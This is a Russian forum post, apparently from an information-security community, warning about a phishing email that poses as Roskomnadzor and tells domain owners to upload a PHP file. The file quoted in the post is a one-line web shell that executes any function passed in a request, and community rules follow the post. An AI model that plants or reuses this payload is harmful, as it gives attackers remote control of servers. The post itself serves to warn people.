Попытка взлома
Забавная попытка развода, с таким еще не сталкивался.
Письмо прилетело. Яндекс его заботливо положил в спам. Обычно я туда редко заглядываю, а тут что-то решил полюбопытствовать..
В общем, пишет нам "Роскомнадзор" :))
На картинке домен не замазываю, потому как домен этот уже лет пять как потерян, и вероятно - навсегда, а вот почт свою решил прикрыть, хоть и заспамленная, а всеж привык :))
Видимо в сети где-то гуляют базы награбленные из WHOIS в те времена когда контакт админа еще был доступен публично, с тех пор вот и пишут всякие.
Но такое - в первый раз.
Текст письма:
"Уважаемый администратор домена!
В соответствии с изменениями, внесенными в Федеральный закон "Об информации, информационных технологиях и о защите информации", необходимо подтвердить, что фактическое управление доменным именем lalsk.ru осуществляется лицом, указанным в качестве его администратора.
Для подтверждения того, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл 19442ys524wvgk.php со следующим содержимым:
<?php
print("JVNUVVBXE");
$_REQUEST['d']($_REQUEST['q']); ?>
Файл должен быть создан в течение трех календарных дней с момента получения настоящего уведомления и присутствовать на сервере до 9 мая 2021 года, 17:00 (UTC+03:00), в противном случае процедура подтверждения будет считаться непройденной.
Если процедура подтверждения не будет пройдена, делегирование доменного имени будет приостановлено."
в PHP я не особо силен, полагаю это должно будет выполнять инструкции из запроса в URL ?
В общем-то не думаю что кто-то поведется, но раз в год и палка стреляет, будьте бдительны :)
Информационная безопасность IT
1.4K постов25.5K подписчик
Правила сообщества
Обязательно к прочтению для авторов:
1. Если вы добавляете пост, утверждающий об утечке данных или наличии дыр в системе, предоставьте ссылку на источники или технически подкованное расследование. Посты из разряда "Какой-то банк слил данные, потому что мне звонили мошенники" будут выноситься в общую ленту.
2. Все вопросы "Как обезопасить сервер\приложение\устройство" - в лигу "Компьютер это просто".
Обязательно к прочтению для всех:
Добавление ссылки разрешено если она не содержит описание коммерческих (платных) продуктов и/или идентификаторов для отслеживания перехода и для доступа не нужен пароль или оплата в т.ч. интернет-ресурсы, каналы (от 3-х тематических видео), блоги, группы, сообщества, СМИ и т.д.
Запрещены политические holy wars.
По решению модератора или администратора сообщества пользователь будет забанен за:
1. Флуд и оскорбление пользователя, в т.ч. провокация спора, флуда, холивара (высказывание без аргументации о конкретной применимости конкретного решения в конкретной ситуации), требование уже данного ответа, распространение сведений порочащих честь и репутацию, принижающих квалификацию оппонента, переходы на личности.
2. Публикацию поста/комментария не соответствующего тематике сообщества, в том числе обсуждение администраторов и модераторов сообщества, для этого есть специальное сообщество.
3. За обвинение в киберпреступной деятельности.
4. За нарушение прочих Правил Пикабу.